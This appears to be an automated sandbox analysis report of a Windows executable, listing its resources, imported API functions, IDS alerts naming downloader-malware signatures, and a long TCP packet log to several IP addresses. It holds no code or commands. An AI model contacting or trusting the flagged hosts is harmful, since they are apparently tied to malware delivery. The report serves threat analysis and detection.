RT_ICON	0x5bd40	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	United States	0.3716216216216216
RT_DIALOG	0x5be68	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x5bfb0	0x13c	data	English	United States	0.5506329113924051
RT_DIALOG	0x5c0f0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x5c1f0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x5c310	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x5c3d8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x5c438	0x92	data	English	United States	0.6575342465753424
RT_VERSION	0x5c4d0	0x248	data	English	United States	0.5308219178082192
RT_MANIFEST	0x5c718	0x340	XML 1.0 document, ASCII text, with very long lines (832), with no line terminators	English	United States	0.5540865384615384

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-21T11:56:59.602497+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	54072	142.250.186.174	443	TCP
2024-10-21T11:57:05.416589+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	54107	158.101.44.242	80	TCP
2024-10-21T11:57:06.651000+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	54107	158.101.44.242	80	TCP
2024-10-21T11:57:07.359299+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	54121	188.114.97.3	443	TCP
2024-10-21T11:57:08.057252+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	54126	158.101.44.242	80	TCP
2024-10-21T11:57:10.128941+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	54140	188.114.97.3	443	TCP
2024-10-21T11:57:13.158285+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	54160	188.114.97.3	443	TCP
2024-10-21T11:57:16.073769+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	54181	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 21, 2024 11:56:58.324038982 CEST	54072	443	192.168.2.4	142.250.186.174
Oct 21, 2024 11:56:58.324064970 CEST	443	54072	142.250.186.174	192.168.2.4
Oct 21, 2024 11:56:58.324131012 CEST	54072	443	192.168.2.4	142.250.186.174
Oct 21, 2024 11:56:58.337802887 CEST	54072	443	192.168.2.4	142.250.186.174
Oct 21, 2024 11:56:58.337817907 CEST	443	54072	142.250.186.174	192.168.2.4
Oct 21, 2024 11:56:59.192800999 CEST	443	54072	142.250.186.174	192.168.2.4
Oct 21, 2024 11:56:59.192869902 CEST	54072	443	192.168.2.4	142.250.186.174
Oct 21, 2024 11:56:59.193438053 CEST	443	54072	142.250.186.174	192.168.2.4
Oct 21, 2024 11:56:59.193485975 CEST	54072	443	192.168.2.4	142.250.186.174
Oct 21, 2024 11:56:59.243141890 CEST	54072	443	192.168.2.4	142.250.186.174
Oct 21, 2024 11:56:59.243161917 CEST	443	54072	142.250.186.174	192.168.2.4
Oct 21, 2024 11:56:59.243357897 CEST	443	54072	142.250.186.174	192.168.2.4
Oct 21, 2024 11:56:59.243429899 CEST	54072	443	192.168.2.4	142.250.186.174
Oct 21, 2024 11:56:59.246618032 CEST	54072	443	192.168.2.4	142.250.186.174
Oct 21, 2024 11:56:59.291403055 CEST	443	54072	142.250.186.174	192.168.2.4
Oct 21, 2024 11:56:59.602442026 CEST	443	54072	142.250.186.174	192.168.2.4
Oct 21, 2024 11:56:59.603291988 CEST	54072	443	192.168.2.4	142.250.186.174
Oct 21, 2024 11:56:59.603305101 CEST	443	54072	142.250.186.174	192.168.2.4
Oct 21, 2024 11:56:59.603374958 CEST	54072	443	192.168.2.4	142.250.186.174
Oct 21, 2024 11:56:59.603420973 CEST	54072	443	192.168.2.4	142.250.186.174
Oct 21, 2024 11:56:59.603452921 CEST	443	54072	142.250.186.174	192.168.2.4
Oct 21, 2024 11:56:59.603516102 CEST	54072	443	192.168.2.4	142.250.186.174
Oct 21, 2024 11:56:59.659027100 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:56:59.659065008 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:56:59.659125090 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:56:59.659332037 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:56:59.659351110 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:00.515922070 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:00.516060114 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:00.545809984 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:00.545833111 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:00.546194077 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:00.546506882 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:00.546798944 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:00.587421894 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.576455116 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.576549053 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.584662914 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.584830046 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.693430901 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.693531036 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.693598986 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.693645954 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.693649054 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.693660975 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.693697929 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.697468996 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.697565079 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.697577000 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.697650909 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.701745033 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.701829910 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.701837063 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.701900959 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.710517883 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.710616112 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.710755110 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.710833073 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.719376087 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.719471931 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.719480038 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.719563007 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.728276968 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.728331089 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.728338957 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.728380919 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.737098932 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.737174034 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.737179995 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.737222910 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.746407032 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.746465921 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.746474028 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.746516943 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.754769087 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.754945040 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.754951954 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.755006075 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.811103106 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.811168909 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.811203957 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.811261892 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.811289072 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.811348915 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.811374903 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.811431885 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.811527967 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.811579943 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.811588049 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.811642885 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.811644077 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.811666965 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.811696053 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.811748981 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.814982891 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.815093994 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.815300941 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.815361023 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.819057941 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.819116116 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.819195032 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.819245100 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.821984053 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.822060108 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.822067022 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.822128057 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.828344107 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.828435898 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.828449011 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.828510046 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.833972931 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.834053040 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.834076881 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.834147930 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.834158897 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.834227085 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.840100050 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.840208054 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.840214968 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.840276003 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.845355988 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.845436096 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.845444918 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.845510006 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.851104021 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.851176977 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.851185083 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.851244926 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.856734037 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.856821060 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.856849909 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.856923103 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.862519979 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.862600088 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.862610102 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.862674952 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.868335009 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.868417025 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.868424892 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.868484974 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.873959064 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.874037981 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.874447107 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.874520063 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.879847050 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.879926920 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.879945040 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.880016088 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.885420084 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.885490894 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.885507107 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.885577917 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.891438007 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.891524076 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.891530991 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.891594887 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.897018909 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.897104025 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.897111893 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.897173882 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.928504944 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.928580046 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.928592920 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.928602934 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.928632975 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.928662062 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.928693056 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.928697109 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.928709030 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.928711891 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.928742886 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.928766012 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.928771973 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.928814888 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.928821087 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.928864956 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.929754972 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.929824114 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.929830074 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.929883003 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.930593014 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.930663109 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.930690050 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.930749893 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.935825109 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.935923100 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.935931921 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.935992002 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.941107035 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.941180944 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.941485882 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.941559076 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.946244955 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.946325064 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.946331978 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.946402073 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.949508905 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.949595928 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.949601889 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.949678898 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.953206062 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.953284025 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.953290939 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.953363895 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.956125021 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.956212997 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.956219912 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.956290007 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.959562063 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.959680080 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.959687948 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.959772110 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.962831974 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.962941885 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.962949038 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.963032961 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.965846062 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.965960979 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.965967894 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.966042042 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.969381094 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.969428062 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.969438076 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.969481945 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.972166061 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.972234964 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.972244978 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.972294092 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.975414991 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.975465059 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.975476980 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.975522041 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.978465080 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.978523970 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.978533983 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.978578091 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.981446028 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.981503963 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.981512070 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.981560946 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.984321117 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.984390974 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.984414101 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.984464884 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.987519979 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.987577915 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.987588882 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.987632990 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.990453005 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.990508080 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.990537882 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.990598917 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.993237972 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.993298054 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.993455887 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.993505955 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.996174097 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.996225119 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.996260881 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.996462107 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.998780012 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.998845100 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:03.998879910 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:03.998929977 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.001704931 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.001754045 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.001761913 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.001823902 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.004535913 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.004586935 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.004595041 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.004647017 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.007416010 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.007474899 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.007503033 CEST	443	54083	142.250.184.225	192.168.2.4
